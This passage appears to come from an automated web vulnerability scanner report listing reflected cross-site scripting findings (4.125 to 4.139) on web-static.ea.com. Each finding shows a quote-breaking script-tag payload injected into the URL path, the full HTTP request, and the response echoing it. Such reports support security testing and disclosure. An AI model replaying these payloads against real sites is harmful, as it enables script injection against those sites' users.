...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/21539"><script>alert(1)</script>24d9a87f4b5" />
...[SNIP]...

4.125. http://web-static.ea.com/us/portal/images/site_logos/nfs.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/nfs.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e7ed"><script>alert(1)</script>3d841534c94 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/3e7ed"><script>alert(1)</script>3d841534c94?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/3e7ed"><script>alert(1)</script>3d841534c94" />
...[SNIP]...

4.126. http://web-static.ea.com/us/portal/images/site_logos/pogo.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/pogo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e953"><script>alert(1)</script>e7214181ec6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/6e953"><script>alert(1)</script>e7214181ec6?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/6e953"><script>alert(1)</script>e7214181ec6" />
...[SNIP]...

4.127. http://web-static.ea.com/us/portal/images/site_logos/sims.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/sims.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcf00"><script>alert(1)</script>8a1fb1ce8fa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/fcf00"><script>alert(1)</script>8a1fb1ce8fa?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:18 GMT
Date: Fri, 24 Jun 2011 14:09:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/fcf00"><script>alert(1)</script>8a1fb1ce8fa" />
...[SNIP]...

4.128. http://web-static.ea.com/us/portal/js/ea/Framework.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/ea/Framework.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c28"><script>alert(1)</script>4871129af1a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/ea/57c28"><script>alert(1)</script>4871129af1a?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30482
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/ea/57c28"><script>alert(1)</script>4871129af1a" />
...[SNIP]...

4.129. http://web-static.ea.com/us/portal/js/ea/ShoppingCartService.jQuery.JSON-1.3.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/ea/ShoppingCartService.jQuery.JSON-1.3.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba4be"><script>alert(1)</script>9ae99465936 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/ea/ba4be"><script>alert(1)</script>9ae99465936?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30481
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/ea/ba4be"><script>alert(1)</script>9ae99465936" />
...[SNIP]...

4.130. http://web-static.ea.com/us/portal/js/jquery/jquery-1.2.6.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-1.2.6.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68c5"><script>alert(1)</script>c2a6993d28f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/a68c5"><script>alert(1)</script>c2a6993d28f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/a68c5"><script>alert(1)</script>c2a6993d28f" />
...[SNIP]...

4.131. http://web-static.ea.com/us/portal/js/jquery/jquery-1.4.2.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c42"><script>alert(1)</script>f68c539e57e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/42c42"><script>alert(1)</script>f68c539e57e?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/42c42"><script>alert(1)</script>f68c539e57e" />
...[SNIP]...

4.132. http://web-static.ea.com/us/portal/js/jquery/jquery-easing-1.3.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-easing-1.3.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992d6"><script>alert(1)</script>04ea07e99ad was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/992d6"><script>alert(1)</script>04ea07e99ad?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/992d6"><script>alert(1)</script>04ea07e99ad" />
...[SNIP]...

4.133. http://web-static.ea.com/us/portal/js/jquery/jquery-facebox-1.2.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-facebox-1.2.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d74d6"><script>alert(1)</script>89130c28a50 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/d74d6"><script>alert(1)</script>89130c28a50?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/d74d6"><script>alert(1)</script>89130c28a50" />
...[SNIP]...

4.134. http://web-static.ea.com/us/portal/js/jquery/jquery-ui-personalized-1.5.3.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery-ui-personalized-1.5.3.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82fd8"><script>alert(1)</script>6436305a584 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/82fd8"><script>alert(1)</script>6436305a584?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/82fd8"><script>alert(1)</script>6436305a584" />
...[SNIP]...

4.135. http://web-static.ea.com/us/portal/js/jquery/jquery.checkbox.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.checkbox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d279"><script>alert(1)</script>6cb44f2e4b0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/1d279"><script>alert(1)</script>6cb44f2e4b0?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/1d279"><script>alert(1)</script>6cb44f2e4b0" />
...[SNIP]...

4.136. http://web-static.ea.com/us/portal/js/jquery/jquery.dynamic-drop.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.dynamic-drop.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc7d8"><script>alert(1)</script>8ca3aee7304 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/fc7d8"><script>alert(1)</script>8ca3aee7304?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:52 GMT
Date: Fri, 24 Jun 2011 13:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/fc7d8"><script>alert(1)</script>8ca3aee7304" />
...[SNIP]...

4.137. http://web-static.ea.com/us/portal/js/jquery/jquery.equalizecols.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.equalizecols.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7f6"><script>alert(1)</script>889bf917fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/ac7f6"><script>alert(1)</script>889bf917fb?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/ac7f6"><script>alert(1)</script>889bf917fb" />
...[SNIP]...

4.138. http://web-static.ea.com/us/portal/js/jquery/jquery.eventcalendar.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.eventcalendar.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a367c"><script>alert(1)</script>ae4ac210b80 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/a367c"><script>alert(1)</script>ae4ac210b80?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:49 GMT
Date: Fri, 24 Jun 2011 13:43:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/a367c"><script>alert(1)</script>ae4ac210b80" />
...[SNIP]...

4.139. http://web-static.ea.com/us/portal/js/jquery/jquery.labelinput.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.labelinput.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567d0"><script>alert(1)</script>98d32ffa9bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/567d0"><script>alert(1)</script>98d32ffa9bc?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
